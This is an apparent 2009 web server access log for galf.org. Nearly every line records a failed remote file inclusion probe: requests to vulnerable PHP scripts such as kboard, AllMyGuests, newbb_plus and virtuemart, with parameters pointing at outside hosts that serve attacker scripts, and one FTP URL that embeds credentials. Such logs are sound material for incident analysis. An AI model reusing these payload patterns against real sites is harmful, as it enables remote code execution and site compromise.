213.251.186.141 - - [02/Nov/2009:05:23:39 -0800] "GET /logs/access_090928.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:23:54 -0800] "GET /logs/access.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:23:55 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:23:55 -0800] "GET /logs/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:24:29 -0800] "GET /logs/access_090810.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:24:29 -0800] "GET /kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:24:29 -0800] "GET /logs/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:31 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:31 -0800] "GET /logs/access_090504.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:31 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:24:32 -0800] "GET /logs/access_090817.log%20%20/skin/ggambo7002_board/write.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:39 -0800] "GET /logs/access_090504.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:39 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:24:39 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.191 - - [02/Nov/2009:05:24:45 -0800] "GET /tmp/?S=A HTTP/1.1" 200 520 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:11 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:11 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:11 -0800] "GET /logs/access_090504.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:32 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:32 -0800] "GET /logs/access_090504.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:25:32 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:25:32 -0800] "GET /logs/access_090316.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:25:37 -0800] "GET /logs/access_090817.log%20%20/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
189.38.90.30 - - [02/Nov/2009:05:27:12 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.247.164.121 - - [02/Nov/2009:05:27:47 -0800] "GET /logs/access.log/errors.php?dir=http://www.ismokehookah.com/id1tot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.247.164.121 - - [02/Nov/2009:05:27:47 -0800] "GET /logs/errors.php?dir=http://www.ismokehookah.com/id1tot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.247.164.121 - - [02/Nov/2009:05:27:47 -0800] "GET /errors.php?dir=http://www.ismokehookah.com/id1tot.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:27:48 -0800] "GET /logs/access_090420.log//error.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:28:02 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:28:02 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:28:17 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:28:49 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:10 -0800] "GET /logs/access_090420.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:13 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:13 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:29:36 -0800] "GET /skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:29:36 -0800] "GET /logs/access_090420.log/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:29:36 -0800] "GET /logs/access_090907.log/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.59 - - [02/Nov/2009:05:29:36 -0800] "GET /logs/skin/happycast_blue/setup.php?dir=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.255.101 - - [02/Nov/2009:05:29:44 -0800] "GET /logs/access.log///admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
222.239.255.101 - - [02/Nov/2009:05:29:44 -0800] "GET //admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
222.239.255.101 - - [02/Nov/2009:05:29:44 -0800] "GET /logs///admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
213.251.186.141 - - [02/Nov/2009:05:29:56 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:29:56 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:29:56 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:29:56 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:58 -0800] "GET /mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:58 -0800] "GET /logs/access_090420.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:58 -0800] "GET /logs/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.122.46.179 - - [02/Nov/2009:05:29:58 -0800] "GET /logs/access_090406.log/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:30:01 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:30:20 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:30:22 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:30:33 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:30:36 -0800] "GET /logs/access_090803.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:30:36 -0800] "GET /logs/access_090316.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.251.186.141 - - [02/Nov/2009:05:30:36 -0800] "GET /logs/access_090316.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:31:41 -0800] "GET /logs/access_090713.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
64.150.183.219 - - [02/Nov/2009:05:31:41 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
210.110.97.12 - - [02/Nov/2009:05:31:57 -0800] "GET /logs/access_091012.log/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.syndiconomie.fr/images/id.png? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
125.251.99.2 - - [02/Nov/2009:05:32:10 -0800] "GET /logs/access_090504.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://allskilledtrades.com/site/offer/com_sef/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:10 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:10 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:15 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:24 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:24 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:24 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:37 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:37 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:32:39 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.239.255.101 - - [02/Nov/2009:05:33:05 -0800] "GET /logs/access.log%20///admin/auth.php?xcart_dir=ftp://leejinseo:vmfldrmftm@114.108.131.23/public_html/v6id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
222.97.189.33 - - [02/Nov/2009:05:33:24 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:33:24 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:33:24 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:29 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:30 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:34 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:34 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:34 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:38 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:38 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [02/Nov/2009:05:33:38 -0800] "GET /logs/access_091012.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:33:39 -0800] "GET /logs/access_090713.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [02/Nov/2009:05:33:39 -0800] "GET /logs/access_090831.log%20%20//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:33:41 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:34:10 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:34:10 -0800] "GET /logs/access_090713.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:34:10 -0800] "GET /logs/access_090831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
222.97.189.33 - - [02/Nov/2009:05:34:13 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.111.12.199 - - [02/Nov/2009:05:34:23 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.seorakhoney.com/shop/mail/i.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:28 -0800] "GET /logs//zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:28 -0800] "GET /logs/access.log%20%20//zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:28 -0800] "GET /zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:32 -0800] "GET /logs/access.log%20%20//zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:32 -0800] "GET /logs//zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:32 -0800] "GET /zero//skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
85.17.19.172 - - [02/Nov/2009:05:34:39 -0800] "GET /skin/dognara_gallery/login.php?dir=http://photoworld.com.ua////zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
